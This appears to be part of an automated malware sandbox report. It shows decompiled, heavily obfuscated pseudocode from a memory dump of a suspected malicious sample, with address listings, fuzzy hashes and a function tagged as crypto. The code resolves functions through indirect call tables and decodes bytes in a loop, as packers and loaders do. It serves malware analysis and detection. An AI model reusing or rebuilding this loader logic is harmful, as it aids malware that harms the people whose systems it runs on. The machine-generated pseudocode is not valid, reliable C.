					 *_t376 =  *_t376 + _t159;
					_t233 =  *((intOrPtr*)(_t264 + 0x41f064))( *(_t369 - 0x1c),  *(_t369 - 0x1c));
				}
				 *(_t369 - 0x24) = _t323;
				 *((intOrPtr*)(_t264 + 0x41ce46)) = _t233;
				_t326 =  *(_t369 - 0x24);
				 *(_t369 - 0x1c) = _t326;
				_t169 = _t264 + 0x41cb9d; // 0x41cb9d
				 *_t376 =  *_t376 - _t363;
				 *_t376 =  *_t376 | _t169;
				_t170 = _t264 + 0x41cd17; // 0x41cd17
				 *(_t369 - 0x20) =  *(_t369 - 0x20) & 0x00000000;
				 *_t376 =  *_t376 | _t170;
				_t236 =  *((intOrPtr*)(_t264 + 0x41f068))( *(_t369 - 0x20), _t363);
				 *_t376 = _t343 & 0x00000000 | _t326 & 0x00000000 ^ _t363;
				 *(_t264 + 0x41d015) = 0 ^ _t236;
				_t348 = 0;
				_t364 = _t363 - 1;
				 *(_t369 - 0x1c) = 0;
				_push( *(_t369 - 0x1c));
				 *_t376 =  *_t376 | _t264;
				do {
					 *_t178 = _t348;
					_t293 =  *(_t369 - 0x20);
					_t294 = _t293 &  *(_t369 - 8);
					if(_t294 == 0) {
						_t364 = _t364 + 1;
						_t236 = _t236 & 0x00000000 ^ (_t348 -  *_t376 |  *(_t369 - 0x18));
						_t348 = _t348;
						_t264 =  *(_t236 + _t364) & 0x000000ff;
					}
					 *_t184 =  *((intOrPtr*)(_t369 - 0xc));
					_t330 =  *(_t369 - 0x20);
					asm("rol edx, cl");
					asm("lodsb");
					_t236 = _t236 | _t330 & _t264;
					 *_t348 = _t236;
					_t348 = _t348 + 1;
					_t186 = _t369 - 4;
					 *_t186 =  *((intOrPtr*)(_t369 - 4)) - 1;
				} while ( *_t186 != 0);
				_t266 =  *_t376;
				_t377 =  &(_t376[1]);
				_t188 = _t266 + 0x41cc0b; // 0x41cc0b
				 *_t377 =  *_t377 & 0x00000000;
				 *_t377 =  *_t377 ^ _t188;
				_t189 = _t266 + 0x41cbd0; // 0x41cbd0
				 *_t377 =  *_t377 & 0x00000000;
				 *_t377 =  *_t377 | _t189;
				_t240 =  *((intOrPtr*)(_t266 + 0x41f068))(_t369, _t294);
				 *(_t369 - 0x20) = _t294;
				 *(_t266 + 0x41d326) =  *(_t266 + 0x41d326) & 0x00000000;
				 *(_t266 + 0x41d326) =  *(_t266 + 0x41d326) ^ (_t294 ^  *(_t369 - 0x20) | _t240);
				 *(_t369 - 0x1c) = _t266;
				return memcpy(_t348, _t364 + 1,  *(_t369 - 0x14));
			}

0x033343d8
0x033343d8
0x033343df
0x033343e2
0x033343e5
0x033343eb
0x033343f2
0x033343f5
0x033343fe
0x033343ff
0x03334402
0x03334405
0x03334411
0x03334414
0x03334417
0x0333441e
0x0333441f
0x03334422
0x03334423
0x03334430
0x03334432
0x03334435
0x0333443e
0x03334442
0x0333444c
0x03334450
0x03334453
0x03334453
0x0333445b
0x03334462
0x03334468
0x0333446d
0x03334473
0x0333447c
0x0333447f
0x03334486
0x0333448a
0x03334493
0x03334494
0x03334497
0x0333449a
0x033344a0
0x033344a7
0x033344ad
0x033344b4
0x033344b7
0x033344bd
0x033344c5
0x033344cc
0x033344d2
0x033344d5
0x033344dc
0x033344e2
0x033344e9
0x033344ec
0x033344f2
0x033344fa
0x03334501
0x03334507
0x0333450a
0x03334511
0x03334517
0x0333451e
0x03334521
0x03334528
0x0333452b
0x0333452e
0x03334534
0x0333453c
0x03334543
0x03334549
0x03334549
0x03334551
0x03334555
0x03334558
0x0333455b
0x03334562
0x03334565
0x03334568
0x03334571
0x03334574
0x0333457a
0x03334584
0x03334587
0x03334593
0x03334596
0x03334599
0x033345a0
0x033345a1
0x033345a4
0x033345b2
0x033345b4
0x033345b7
0x033345b9
0x033345bf
0x033345c9
0x033345cc
0x033345d2
0x033345dc
0x033345df
0x033345e5
0x033345ec
0x033345f2
0x033345f2
0x033345fe
0x03334603
0x0333460d
0x03334611
0x03334614
0x0333461a
0x03334621
0x03334624
0x0333462b
0x0333462e
0x03334631
0x0333463d
0x03334644
0x0333464a
0x03334654
0x03334657
0x0333465b
0x0333465f
0x03334662
0x03334668
0x03334672
0x03334675
0x03334681
0x03334688
0x0333468e
0x03334695
0x03334698
0x033346a1
0x033346a5
0x033346af
0x033346b2
0x033346b9
0x033346bc
0x033346bf
0x033346c5
0x033346cf
0x033346d2
0x033346d8
0x033346e0
0x033346e7
0x033346f2
0x033346f5
0x033346f8
0x03334700
0x03334704
0x0333470a
0x03334710
0x0333471a
0x0333471d
0x03334729
0x03334730
0x03334736
0x03334741
0x03334743
0x03334744
0x0333474a
0x03334754
0x03334757
0x0333475d
0x03334767
0x0333476a
0x03334773
0x03334776
0x03334781
0x03334788
0x0333478b
0x0333478e
0x03334791
0x03334792
0x03334793
0x033347a0
0x033347a5
0x033347a7
0x033347ad
0x033347b4
0x033347b7
0x033347bd
0x033347c4
0x033347c7
0x033347c7
0x033347cd
0x033347d4
0x033347da
0x033347dd
0x033347ed
0x033347f4
0x033347f7
0x033347fa
0x03334800
0x03334807
0x0333480a
0x03334812
0x03334819
0x0333481f
0x03334820
0x03334821
0x03334828
0x0333482b
0x0333482e
0x0333482f
0x03334835
0x03334836
0x03334839
0x0333483b
0x03334846
0x03334848
0x03334849
0x03334849
0x03334850
0x03334856
0x03334857
0x0333485b
0x0333485c
0x0333485e
0x03334860
0x03334861
0x03334861
0x03334861
0x03334868
0x0333486b
0x0333486e
0x03334875
0x03334879
0x0333487c
0x03334883
0x03334887
0x0333488a
0x03334890
0x03334898
0x0333489f
0x033348a8
0x033348c1

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950c55eab0a1380bd81bf2ad2fa2bd8a9b0f1be257dd98b9728846acfec3c26f
Instruction ID: b5fc4a0bd053223690eeb4506500aafaacb2005083810f757250748adb976c5a
Opcode Fuzzy Hash: 950c55eab0a1380bd81bf2ad2fa2bd8a9b0f1be257dd98b9728846acfec3c26f
Instruction Fuzzy Hash: 280233728042089FEF04DFA4C88A7EEBBF1FF48310F19856ED889AA145D7385515CF69

Uniqueness

Uniqueness Score: -1.00%

Function 03335A25, Relevance: .3, Instructions: 281
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E03335A25(signed int __ebx, void* __ecx, signed int __edx, intOrPtr* __edi, signed int __esi) {
				signed int _t406;
				signed int _t409;
				intOrPtr _t411;
				signed int _t413;
				void* _t415;
				signed int _t416;
				signed int _t419;
				signed int _t424;
				signed int _t430;
				void* _t431;
				signed int _t435;
				void* _t437;
				intOrPtr _t438;
				intOrPtr _t441;
				signed int _t443;
				void* _t444;
				signed int _t446;
				signed int _t451;
				signed int _t453;
				signed int _t456;
				signed int _t459;
				signed int _t463;
				void* _t465;
				void* _t466;
				signed int _t469;
				signed int _t474;
				signed int _t479;
				void* _t480;
				signed int _t482;
				void* _t484;
				signed int _t485;
				intOrPtr _t490;
				signed int _t491;
				signed int _t493;
				void* _t495;
				signed int _t496;
				signed int _t500;
				void* _t502;
				signed int _t503;
				signed int _t506;
				signed int _t509;
				intOrPtr _t512;
				signed int _t520;
				signed int _t522;
				void* _t523;
				signed int _t532;
				signed int _t535;
				signed int _t538;
				signed int _t540;
				signed int _t543;
				void* _t545;
				void* _t547;
				signed int _t551;
				signed int _t553;
				void* _t554;
				signed int _t559;
				signed int _t561;
				void* _t564;
				signed int _t566;
				signed int _t568;
				signed int _t574;
				void* _t577;
				signed int _t580;
				signed int _t583;
				signed int _t585;
				signed int _t588;
				signed int _t590;
				signed int _t592;
				signed int _t594;
				signed int _t597;
				signed int _t601;
				signed int _t604;
				signed int _t607;
				signed int _t610;
				signed int _t613;
				signed int _t616;
				signed int _t619;
				signed int _t622;
				void* _t625;
				signed int _t629;
				signed int _t631;
				signed int _t634;
				signed int _t637;
				signed int _t642;
				signed int _t645;
				signed int _t648;
				void* _t651;
				signed int _t653;
				void* _t654;
				signed int _t656;
				signed int _t664;
				signed int _t665;
				signed int _t668;
				void* _t669;
				signed int _t671;
				signed int _t672;
				signed int _t675;
				signed int _t678;
				signed int _t681;
				signed int _t692;
				signed int _t695;
				signed int _t696;
				signed int _t704;
				void* _t705;
				signed int _t707;
				signed int* _t717;
				signed int* _t718;
				signed int* _t719;
				signed int* _t720;
				signed int* _t721;
				signed int* _t722;
				signed int* _t723;
				signed int* _t724;

				_t640 = __edi;
				_t597 = __edx;
				_t532 = __ebx;
				_push(__edi);
				 *_t717 =  *_t717 & 0x00000000;
				 *_t717 =  *_t717 + __ebx + 0x41c13d;
				_t406 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t704 - 0x14) = __esi;
				 *(__ebx + 0x41c112) = 0 ^ _t406;
				_t664 =  *(_t704 - 0x14);
				while(1) {
					L15:
					_t721[1] =  *_t675;
					_t540 = _t538;
					 *_t721 =  *_t721 ^ _t675;
					 *_t721 =  *_t721 ^ _t540 + 0x0041d099;
					_t453 =  *((intOrPtr*)(_t540 + 0x41f060))(_t704);
					 *_t721 = _t574;
					 *(_t540 + 0x41c24c) = 0 ^ _t453;
					_t577 = 0;
					 *_t276 = _t675;
					 *_t721 =  *_t721 & 0x00000000;
					 *_t721 =  *_t721 + _t540 + 0x41cdd2;
					 *_t721 =  *_t721 & 0x00000000;
					 *_t721 =  *_t721 | _t540 + 0x0041c846;
					_t456 =  *((intOrPtr*)(_t540 + 0x41f068))(_t704, _t645);
					 *(_t704 - 0x10) = _t616;
					 *(_t540 + 0x41c9fe) = 0 ^ _t456;
					_t619 =  *(_t704 - 0x10);
					 *(_t704 - 0xc) =  *(_t704 - 0xc) & 0x0000ffff;
					 *_t721 =  *_t721 ^ _t619;
					 *_t721 =  *_t721 | _t540 + 0x0041c9e4;
					 *_t721 =  *_t721 & 0x00000000;
					 *_t721 =  *_t721 ^ _t540 + 0x0041c746;
					_t459 =  *((intOrPtr*)(_t540 + 0x41f068))(_t619, _t619);
					 *(_t704 - 0x14) = _t619;
					 *(_t540 + 0x41c559) =  *(_t540 + 0x41c559) & 0x00000000;
					 *(_t540 + 0x41c559) =  *(_t540 + 0x41c559) ^ (_t619 ^  *(_t704 - 0x14) | _t459);
					_t622 =  *(_t704 - 0x14);
					while(1) {
						 *(_t704 - 0x10) = _t540;
						_t543 =  *(_t704 - 0x10);
						_t299 = _t543 + 0x41cb0b; // 0x41cb0b
						 *(_t704 - 0x14) = 0;
						 *_t721 =  *_t721 | _t299;
						_t463 =  *((intOrPtr*)(_t543 + 0x41f060))( *(_t704 - 0x14));
						 *_t721 = _t463;
						_t304 = _t543 + 0x41cda5; // 0x41cda5
						 *_t721 = _t304;
						_t465 =  *((intOrPtr*)(_t543 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x10));
						_t722 = _t721 - 0xfffffffc;
						 *_t722 =  *_t722 ^ _t704;
						_t705 = _t465;
						_t466 = _t705 +  *_t721;
						_t707 = 0;
						 *(_t707 - 0x14) = _t675;
						_t580 =  *(_t543 + 0x41c96a);
						_t678 =  *(_t707 - 0x14);
						if(_t580 > _t466) {
							_t310 = _t543 + 0x41cb0b; // 0x41cb0b
							 *_t722 =  *_t722 & 0x00000000;
							 *_t722 =  *_t722 | _t310;
							_t311 = _t543 + 0x41cda5; // 0x41cda5
							 *(_t707 - 0x14) =  *(_t707 - 0x14) & 0x00000000;
							 *_t722 =  *_t722 | _t311;
							_t466 =  *((intOrPtr*)(_t543 + 0x41f064))( *(_t707 - 0x14), _t707);
						}
						 *_t316 = _t466;
						 *_t318 =  *(_t707 - 0x10);
						_t722[1] =  *(_t707 - 0xc);
						_t545 = _t543;
						_t321 = _t545 + 0x41cee2; // 0x41cee2
						 *_t722 = _t321;
						_t323 = _t545 + 0x41d33a; // 0x41d33a
						 *(_t707 - 0x14) = 0;
						 *_t722 =  *_t722 | _t323;
						_t469 =  *((intOrPtr*)(_t545 + 0x41f068))( *(_t707 - 0x14),  *(_t707 - 0x10), _t580);
						 *(_t545 + 0x41d1da) =  *(_t545 + 0x41d1da) & 0x00000000;
						 *(_t545 + 0x41d1da) =  *(_t545 + 0x41d1da) | _t678 -  *_t722 | _t469;
						_t681 = _t678;
						 *(_t707 - 0x10) = _t645;
						_t648 =  *(_t707 - 0x10);
						 *_t722 =  *_t722 - _t622;
						 *_t722 =  *_t722 ^ (_t469 & 0x00000000 | _t645 ^  *(_t707 - 0x10) |  *(_t707 - 4));
						_t335 = _t545 + 0x41d2b3; // 0x41d2b3
						 *_t722 =  *_t722 - _t622;
						 *_t722 = _t335;
						_t336 = _t545 + 0x41cb87; // 0x41cb87
						 *(_t707 - 0x10) =  *(_t707 - 0x10) & 0x00000000;
						 *_t722 =  *_t722 + _t336;
						_t474 =  *((intOrPtr*)(_t545 + 0x41f068))( *(_t707 - 0x10), _t622, _t622);
						 *(_t707 - 0x10) = _t580;
						 *(_t545 + 0x41cf9a) =  *(_t545 + 0x41cf9a) & 0x00000000;
						 *(_t545 + 0x41cf9a) =  *(_t545 + 0x41cf9a) | _t580 ^  *(_t707 - 0x10) | _t474;
						_t583 =  *(_t707 - 0x10);
						_t723 =  &(_t722[1]);
						 *(_t707 - 0x10) = 0;
						 *_t723 =  *_t723 ^  *_t722;
						_t350 = _t545 + 0x41c922; // 0x41c922
						 *(_t707 - 0x10) = 0;
						 *_t723 =  *_t723 | _t350;
						_t353 = _t545 + 0x41c97d; // 0x41c97d
						 *_t723 =  *_t723 & 0x00000000;
						 *_t723 =  *_t723 + _t353;
						_t479 =  *((intOrPtr*)(_t545 + 0x41f068))(_t583,  *(_t707 - 0x10),  *(_t707 - 0x10));
						 *(_t545 + 0x41cae1) =  *(_t545 + 0x41cae1) & 0x00000000;
						 *(_t545 + 0x41cae1) =  *(_t545 + 0x41cae1) | _t707 & 0x00000000 | _t479;
						_t704 = _t707;
						_t480 =  *((intOrPtr*)(_t545 + 0x41f050))();
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 + _t480;
						_t362 = _t545 + 0x41c197; // 0x41c197
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 | _t362;
						_t482 =  *((intOrPtr*)(_t545 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x14));
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 | _t482;
						_t368 = _t545 + 0x41c46f; // 0x41c46f
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 ^ _t368;
						_t484 =  *((intOrPtr*)(_t545 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x14));
						_pop( *_t372);
						_t585 = (_t583 & 0x00000000) +  *(_t704 - 0x10);
						 *_t374 = _t484;
						 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t585;
						_push( *(_t704 - 0x14));
						_pop(_t485);
						_t547 = _t545;
						 *(_t704 - 0x10) = _t648;
						_t574 = _t585 & 0x00000000 ^ _t648 -  *(_t704 - 0x10) ^  *(_t547 + 0x41c9d0);
						_t645 =  *(_t704 - 0x10);
						if(_t574 > _t485) {
							_t382 = _t547 + 0x41c197; // 0x41c197
							 *_t723 =  *_t723 & 0x00000000;
							 *_t723 =  *_t723 + _t382;
							_t383 = _t547 + 0x41c46f; // 0x41c46f
							 *(_t704 - 0x10) = 0;
							 *_t723 =  *_t723 ^ _t383;
							_t485 =  *((intOrPtr*)(_t547 + 0x41f064))( *(_t704 - 0x10), _t681);
							 *(_t547 + 0x41cfe1) =  *(_t547 + 0x41cfe1) & 0x00000000;
							 *(_t547 + 0x41cfe1) =  *(_t547 + 0x41cfe1) | _t704 ^  *_t723 ^ _t485;
							_t704 = _t704;
						}
						_t721 =  &(_t723[1]);
						 *_t721 =  *_t721 ^ _t704;
						 *_t721 = _t681;
						 *_t721 = _t485 & 0x00000000 |  *_t723;
						_t490 = 0;
						 *_t721 = _t622;
						 *((intOrPtr*)( *((intOrPtr*)(_t704 - 8)))) = _t490;
						_t625 = 0;
						 *_t392 = _t704;
						 *_t721 = 4;
						_t491 = _t547;
						 *_t394 = 0 ^  *(_t704 - 0x14);
						 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t491;
						_t675 =  *(_t704 - 0x14);
						_t616 = _t625;
						 *_t399 =  *((intOrPtr*)(_t704 - 8));
						 *(_t704 - 0x10) =  *(_t704 - 0x10) + _t491;
						 *_t403 =  *(_t704 - 0x10);
						_t538 = _t547;
						if( *_t675 != 0) {
							goto L9;
						}
						L21:
						_t640 = _t645 + 0x14;
						_t664 = _t675;
						if( *_t640 != 0 ||  *(_t640 + 0x10) != 0) {
							if( *_t640 != 0) {
								 *_t23 =  *_t640;
								_t665 =  *(_t704 - 0x14);
								_t25 = _t532 + 0x41d32a; // 0x41d32a
								 *_t717 =  *_t717 & 0x00000000;
								 *_t717 =  *_t717 ^ _t25;
								_t26 = _t532 + 0x41cdb4; // 0x41cdb4
								 *_t717 =  *_t717 ^ _t704;
								 *_t717 = _t26;
								_t409 =  *((intOrPtr*)(_t532 + 0x41f068))(_t704, _t704);
								 *(_t532 + 0x41cada) =  *(_t532 + 0x41cada) & 0x00000000;
								 *(_t532 + 0x41cada) =  *(_t532 + 0x41cada) | _t597 & 0x00000000 ^ _t409;
								_t597 = _t597;
							} else {
								_t6 = _t538 + 0x41d076; // 0x41d076
								 *(_t704 - 0x10) = 0;
								 *_t721 =  *_t721 | _t6;
								_t520 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x10));
								 *(_t704 - 0x14) = _t664;
								 *(_t538 + 0x41d0ee) = 0 ^ _t520;
								_push( *(_t640 + 0x10));
								_pop( *_t14);
								_push( *(_t704 - 0x10));
								_pop(_t665);
								_t16 = _t538 + 0x41c2b0; // 0x41c2b0
								 *_t721 = _t16;
								_t522 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x10));
								 *(_t538 + 0x41c1b3) =  *(_t538 + 0x41c1b3) & 0x00000000;
								 *(_t538 + 0x41c1b3) =  *(_t538 + 0x41c1b3) | _t704 ^  *_t721 | _t522;
								_t704 = _t704;
							}
							_t601 =  *_t717;
							 *_t717 =  *(_t640 + 0x10);
							_t34 = _t532 + 0x41c661; // 0x41c661
							 *_t717 =  *_t717 ^ _t704;
							 *_t717 =  *_t717 + _t34;
							_t411 =  *((intOrPtr*)(_t532 + 0x41f060))(_t597);
							 *_t717 = _t665;
							 *((intOrPtr*)(_t532 + 0x41d31e)) = _t411;
							_t668 = 0;
							 *_t37 = _t704;
							_t38 = _t532 + 0x41c5b3; // 0x41c5b3
							 *_t717 = _t38;
							_t413 =  *((intOrPtr*)(_t532 + 0x41f060))( *(_t704 - 0x10));
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t717 =  *_t717 ^ _t413;
							_t44 = _t532 + 0x41c868; // 0x41c868
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 ^ _t44;
							_t415 =  *((intOrPtr*)(_t532 + 0x41f060))( *(_t704 - 0x14));
							 *_t46 = _t640;
							_t551 = 0 ^  *(_t704 - 0x10);
							 *_t48 = _t415;
							 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t551;
							_push( *(_t704 - 0x14));
							_pop(_t416);
							_t642 = _t640;
							 *(_t704 - 0x14) = _t416;
							_t553 = _t551 & 0x00000000 ^ _t416 & 0x00000000 ^  *(_t532 + 0x41c633);
							_t419 =  *(_t704 - 0x14);
							if(_t553 > _t419) {
								_t55 = _t532 + 0x41c5b3; // 0x41c5b3
								 *_t717 = _t55;
								_t57 = _t532 + 0x41c868; // 0x41c868
								 *(_t704 - 0x10) =  *(_t704 - 0x10) & 0x00000000;
								 *_t717 =  *_t717 | _t57;
								_t419 =  *((intOrPtr*)(_t532 + 0x41f064))( *(_t704 - 0x10),  *(_t704 - 0x14));
							}
							 *(_t704 - 0x10) = _t601;
							 *(_t532 + 0x41c2a0) =  *(_t532 + 0x41c2a0) & 0x00000000;
							 *(_t532 + 0x41c2a0) =  *(_t532 + 0x41c2a0) | _t601 & 0x00000000 ^ _t419;
							_t604 =  *(_t704 - 0x10);
							 *(_t704 - 0x10) = _t532;
							_t535 =  *(_t704 - 0x10);
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 | _t419 & 0x00000000 | _t532 & 0x00000000 ^  *(_t704 + 8);
							_t71 = _t535 + 0x41c812; // 0x41c812
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 + _t71;
							_t72 = _t535 + 0x41ca65; // 0x41ca65
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 | _t72;
							_t424 =  *((intOrPtr*)(_t535 + 0x41f068))(_t553, _t668);
							 *(_t704 - 0x14) = _t642;
							 *(_t535 + 0x41d25f) =  *(_t535 + 0x41d25f) & 0x00000000;
							 *(_t535 + 0x41d25f) =  *(_t535 + 0x41d25f) ^ (_t642 -  *(_t704 - 0x14) | _t424);
							_t645 =  *(_t704 - 0x14);
							 *_t81 = _t553;
							 *_t717 =  *_t717 ^ _t668;
							_push( *((intOrPtr*)(_t704 - 8)));
							_pop(_t669);
							 *((intOrPtr*)(_t704 - 8)) = _t669 +  *(_t704 - 0x10);
							_t671 = 0;
							_t85 = _t535 + 0x41d15d; // 0x41d15d
							 *_t717 =  *_t717 - _t553;
							 *_t717 = _t85;
							_t86 = _t535 + 0x41c260; // 0x41c260
							 *(_t704 - 0x10) = 0;
							 *_t717 =  *_t717 | _t86;
							_push( *((intOrPtr*)(_t535 + 0x41f068))( *(_t704 - 0x10), _t553));
							_pop( *_t90);
							_push( *(_t704 - 0x10));
							_pop( *_t92);
							_push( *((intOrPtr*)(_t645 + 0xc)));
							_pop( *_t94);
							_push( *(_t704 - 0x14));
							_pop(_t554);
							 *_t717 =  *_t717 & 0x00000000;
							 *_t717 =  *_t717 + _t554;
							_t96 = _t535 + 0x41ca52; // 0x41ca52
							 *_t717 =  *_t717 - _t535;
							 *_t717 =  *_t717 + _t96;
							_t430 =  *((intOrPtr*)(_t535 + 0x41f060))(_t535, _t535);
							 *(_t704 - 0x14) = _t604;
							 *(_t535 + 0x41cd09) =  *(_t535 + 0x41cd09) & 0x00000000;
							 *(_t535 + 0x41cd09) =  *(_t535 + 0x41cd09) | _t604 -  *(_t704 - 0x14) ^ _t430;
							_t607 =  *(_t704 - 0x14);
							_t718 = _t717 - 0xfffffffc;
							_push(0);
							 *_t718 =  *_t718 | _t430;
							_push( *_t717);
							_pop(_t431);
							 *_t718 = _t431 +  *(_t704 + 8);
							_t107 = _t535 + 0x41c07f; // 0x41c07f
							 *_t718 = _t107;
							_t435 =  *((intOrPtr*)(_t535 + 0x41f060))( *(_t704 - 0x10),  *(_t704 - 0x14));
							 *_t718 =  *_t718 - _t607;
							 *_t718 =  *_t718 | _t435;
							_t110 = _t535 + 0x41d248; // 0x41d248
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t718 =  *_t718 | _t110;
							_t437 =  *((intOrPtr*)(_t535 + 0x41f060))( *(_t704 - 0x14), _t607);
							_t559 =  *_t718;
							_t719 =  &(_t718[1]);
							 *(_t704 - 0x10) = _t535;
							_push(_t559 + _t437);
							_t538 =  *(_t704 - 0x10);
							_pop(_t438);
							_t561 = _t559 & 0x00000000 ^ _t607 -  *_t719 ^  *(_t538 + 0x41d0e6);
							_t610 = _t607;
							if(_t561 > _t438) {
								_t118 = _t538 + 0x41c07f; // 0x41c07f
								 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
								 *_t719 =  *_t719 + _t118;
								_t122 = _t538 + 0x41d248; // 0x41d248
								 *(_t704 - 0x14) = 0;
								 *_t719 =  *_t719 | _t122;
								_t438 =  *((intOrPtr*)(_t538 + 0x41f064))( *(_t704 - 0x14),  *(_t704 - 0x14));
								 *(_t704 - 0x10) = _t671;
								 *((intOrPtr*)(_t538 + 0x41cd68)) = _t438;
								_t671 =  *(_t704 - 0x10);
							}
							_pop( *_t129);
							 *_t719 = _t561 & 0x00000000 ^  *(_t704 - 0x10);
							_t564 = _t671;
							_t672 = _t564 +  *(_t704 + 8);
							_t566 = 0;
							 *_t719 =  *_t719 & 0x00000000;
							 *_t719 =  *_t719 | _t566;
							_t132 = _t538 + 0x41d135; // 0x41d135
							 *_t719 = _t132;
							_t134 = _t538 + 0x41c60e; // 0x41c60e
							 *_t719 =  *_t719 & 0x00000000;
							 *_t719 =  *_t719 | _t134;
							_t441 =  *((intOrPtr*)(_t538 + 0x41f068))(_t566,  *(_t704 - 0x10), _t438);
							 *(_t704 - 0x14) = _t610;
							 *((intOrPtr*)(_t538 + 0x41c3e6)) = _t441;
							_t613 =  *(_t704 - 0x14);
							_t568 =  *_t719;
							_t720 = _t719 - 0xfffffffc;
							 *_t720 =  *_t720 - _t613;
							 *_t720 =  *_t720 ^ _t568;
							_t139 = _t538 + 0x41c220; // 0x41c220
							 *(_t704 - 0x14) = 0;
							 *_t720 =  *_t720 + _t139;
							_t443 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x14), _t613);
							 *(_t704 - 0x10) = _t568;
							 *(_t538 + 0x41cf1d) =  *(_t538 + 0x41cf1d) & 0x00000000;
							 *(_t538 + 0x41cf1d) =  *(_t538 + 0x41cf1d) ^ (_t568 ^  *(_t704 - 0x10) | _t443);
							_t444 =  *((intOrPtr*)(_t538 + 0x41f054))();
							 *(_t704 - 0x14) = 0;
							 *_t720 =  *_t720 + _t444;
							_t153 = _t538 + 0x41c49b; // 0x41c49b
							 *(_t704 - 0x10) = 0;
							 *_t720 =  *_t720 + _t153;
							_t446 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x10),  *(_t704 - 0x14));
							 *(_t704 - 0x14) = _t672;
							 *(_t538 + 0x41c8aa) =  *(_t538 + 0x41c8aa) & 0x00000000;
							 *(_t538 + 0x41c8aa) =  *(_t538 + 0x41c8aa) | _t672 & 0x00000000 ^ _t446;
							_t675 =  *(_t704 - 0x14);
							_t721 = _t720 - 0xfffffffc;
							 *(_t704 - 0x10) = _t613;
							 *(_t704 - 4) =  *(_t704 - 4) & 0x00000000;
							 *(_t704 - 4) =  *(_t704 - 4) ^ _t613 -  *(_t704 - 0x10) ^ _t446 & 0x00000000 ^  *_t720;
							_t616 =  *(_t704 - 0x10);
							_t170 = _t538 + 0x41c279; // 0x41c279
							 *_t721 = _t170;
							_t172 = _t538 + 0x41d1ea; // 0x41d1ea
							 *_t721 =  *_t721 - _t675;
							 *_t721 = _t172;
							_t451 =  *((intOrPtr*)(_t538 + 0x41f068))(_t675,  *(_t704 - 0x14));
							 *(_t704 - 0x14) =  *(_t704 - 0x10);
							 *(_t538 + 0x41cbc5) = 0 ^ _t451;
							_t574 =  *(_t704 - 0x14);
							goto L9;
						}
						 *_t721 =  *_t721 ^ _t491;
						_t523 = _t491;
						return _t523;
						L9:
						if(( *_t675 & 0x80000000) != 0) {
							goto L15;
						} else {
							_t179 = _t538 + 0x41c8e1; // 0x41c8e1
							 *_t721 =  *_t721 - _t616;
							 *_t721 =  *_t721 | _t179;
							_t493 =  *((intOrPtr*)(_t538 + 0x41f060))(_t616);
							 *(_t704 - 0x10) = 0;
							 *_t721 =  *_t721 | _t493;
							_t183 = _t538 + 0x41c6e2; // 0x41c6e2
							 *_t721 =  *_t721 - _t538;
							 *_t721 =  *_t721 | _t183;
							_t495 =  *((intOrPtr*)(_t538 + 0x41f060))(_t538,  *(_t704 - 0x10));
							_t588 = (_t574 & 0x00000000) +  *_t721;
							_t724 = _t721 - 0xfffffffc;
							 *_t724 =  *_t724 + _t645;
							_t651 = _t495;
							_t496 = _t651 + _t588;
							_t653 = 0;
							 *(_t704 - 0x10) = _t616;
							_t590 = _t588 & 0x00000000 ^ _t616 ^  *(_t704 - 0x10) ^  *(_t538 + 0x41c521);
							_t629 =  *(_t704 - 0x10);
							if(_t590 > _t496) {
								_t189 = _t538 + 0x41c8e1; // 0x41c8e1
								 *_t724 =  *_t724 & 0x00000000;
								 *_t724 =  *_t724 | _t189;
								_t190 = _t538 + 0x41c6e2; // 0x41c6e2
								 *_t724 = _t190;
								_t496 =  *((intOrPtr*)(_t538 + 0x41f064))( *(_t704 - 0x10), _t675);
							}
							 *(_t538 + 0x41c56c) =  *(_t538 + 0x41c56c) & 0x00000000;
							 *(_t538 + 0x41c56c) =  *(_t538 + 0x41c56c) ^ (_t704 & 0x00000000 | _t496);
							_t704 = _t704;
							 *_t724 =  *_t724 & 0x00000000;
							 *_t724 =  *_t724 + _t675;
							_t197 = _t538 + 0x41c266; // 0x41c266
							 *_t724 = _t197;
							_push( *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x10), _t496));
							_pop( *_t200);
							_push( *(_t704 - 0x10));
							_pop( *_t202);
							_t692 =  *_t675;
							_t203 = _t538 + 0x41ce1f; // 0x41ce1f
							 *_t724 =  *_t724 & 0x00000000;
							 *_t724 =  *_t724 ^ _t203;
							_t500 =  *((intOrPtr*)(_t538 + 0x41f060))(_t692);
							 *(_t704 - 0x10) = 0;
							 *_t724 =  *_t724 ^ _t500;
							_t207 = _t538 + 0x41c0ad; // 0x41c0ad
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t724 =  *_t724 | _t207;
							_t502 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x10));
							_pop( *_t212);
							_t592 = _t590 & 0x00000000 |  *(_t704 - 0x14);
							 *_t214 = _t502;
							 *(_t704 - 0x10) =  *(_t704 - 0x10) + _t592;
							_push( *(_t704 - 0x10));
							_pop(_t503);
							_t631 = _t629;
